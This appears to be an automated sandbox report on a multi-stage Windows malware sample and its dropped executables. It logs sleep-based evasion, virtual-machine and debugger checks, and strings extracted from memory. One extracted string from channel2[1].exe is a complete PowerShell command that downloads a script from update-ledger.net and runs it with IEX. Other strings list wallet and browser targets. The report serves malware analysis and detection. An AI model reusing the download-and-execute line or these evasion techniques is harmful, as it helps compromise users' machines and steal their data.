Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586638s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586470s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586314s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586105s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585905s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585639s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585310s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584895s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584640s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584477s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584286s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6084	Thread sleep time: -16340000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6304	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248	Thread sleep time: -116000s >= -30000s
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 5876	Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3636	Thread sleep count: 170 > 30
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe TID: 4456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_004062EB FindFirstFileW,FindClose,	0_2_004062EB
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CB1
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00614005
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061C2FF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0061494A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD14 FindFirstFileW,FindClose,	19_2_0061CD14
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0061CD9F
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F5D8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F735
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061FA36
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00613CE2
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC38B4 FindFirstFileExW,	24_2_00CC38B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007638B4 FindFirstFileExW,	27_2_007638B4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004415EE FindFirstFileExW,	31_2_004415EE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B31855 FindFirstFileExW,	31_2_02B31855

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

19_2_005C5D13

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 90918
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599876
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599748
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599475
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599359
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 88365
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599192
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598829
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598466
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598275
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598122
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597959
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597755
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597609
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597491
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597372
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597219
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597090
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596831
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596712
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596566
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596440
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596323
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596204
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596070
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595880
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595695
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595055
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594851
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594684
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594447
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594326
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594205
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594044
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593923
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593802
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 87631
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593555
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593395
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593270
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593136
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593024
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592894
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592725
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592572
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592428
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591935
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591600
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591422
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591188
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591072
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590942
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590798
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590645
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590517
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590400
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590274
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590129
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589991
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589830
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589589
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589386
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589203
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589102
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588832
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588576
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588213
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 96076
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587769
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587619
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587501
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587354
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587144
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586881
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586638
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586470
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586105
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585905
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585639
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585310
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584895
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584640
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584286
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584155
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Thread delayed: delay time: 37000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950	Jump to behavior

Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Avmtoolsd.dll
Source: 3546345.exe.11.dr	Binary or memory string: MPGamesUnknown %dTwitch StudioFacebookToolbarMessengersrcOEMLenovoServiceBridgeThinkBuzanFree_PDF_SolutionsVMwarePunkBusterNoxSony CorporationRAV Endpoint Protection
Source: kitty.exe, 00000018.00000002.3280704140.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	Binary or memory string: vmware
Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dllal\
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, D0nMCdvUeB.exe.51.dr	Binary or memory string: HgFSVDCVdb86m2CfHM1
Source: Cerker.exe, 0000001C.00000003.4062158892.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dll.0\
Source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: channel2[1].exe.11.dr	Binary or memory string: (32-bit)DBGIsolatedStorageIdentityNexusIntegrationUnknown %dMovavi Video ConverterMovavi Video Editor/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$Resp = Invoke-WebRequest -Uri 'https://update-ledger.net/update' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr"Free_PDF_SolutionsLenovoServiceBridgeVMwareu^
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWV!t
Source: Channel1[1].exe.11.dr	Binary or memory string: ey&[ySUPERAntiSpywareCrashReportClientContacts.VirtualBoxLenovoServiceBridgeEdrawFree_PDF_SolutionsVMwarewalletsLGHUBLogitechAnkamaw+bMegaDownloaderThinkBuzanCode CacheABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ODISWindowsCommsOpera Software\Opera GX StableatomNichromeCyberLinkMetroVALORANT>
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\jq
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,jq
Source: winmsbt.exe, 00000021.00000002.4601446833.000000000102C000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4739504594.000000001BCC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process queried: DebugPort
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process queried: DebugPort

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006245D5 BlockInput,

19_2_006245D5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_005C5240

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_005E5CAC

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406312

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF0DD mov eax, dword ptr fs:[00000030h]	24_2_00CBF0DD
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF099 mov eax, dword ptr fs:[00000030h]	24_2_00CBF099
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB5760 mov eax, dword ptr fs:[00000030h]	24_2_00CB5760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F0DD mov eax, dword ptr fs:[00000030h]	27_2_0075F0DD
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00755760 mov eax, dword ptr fs:[00000030h]	27_2_00755760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F099 mov eax, dword ptr fs:[00000030h]	27_2_0075F099
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043DCE2 mov eax, dword ptr fs:[00000030h]	31_2_0043DCE2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00439F7B mov eax, dword ptr fs:[00000030h]	31_2_00439F7B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A0FACB push dword ptr fs:[00000030h]	31_2_02A0FACB
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2A1E2 mov eax, dword ptr fs:[00000030h]	31_2_02B2A1E2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF092B mov eax, dword ptr fs:[00000030h]	31_2_02AF092B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2DF49 mov eax, dword ptr fs:[00000030h]	31_2_02B2DF49
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF0D90 mov eax, dword ptr fs:[00000030h]	31_2_02AF0D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_006088CD

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process token adjusted: Debug
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DA354 SetUnhandledExceptionFilter,	19_2_005DA354
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_005DA385
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00CB0811
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB3DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00CB3DF3
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00CB0594
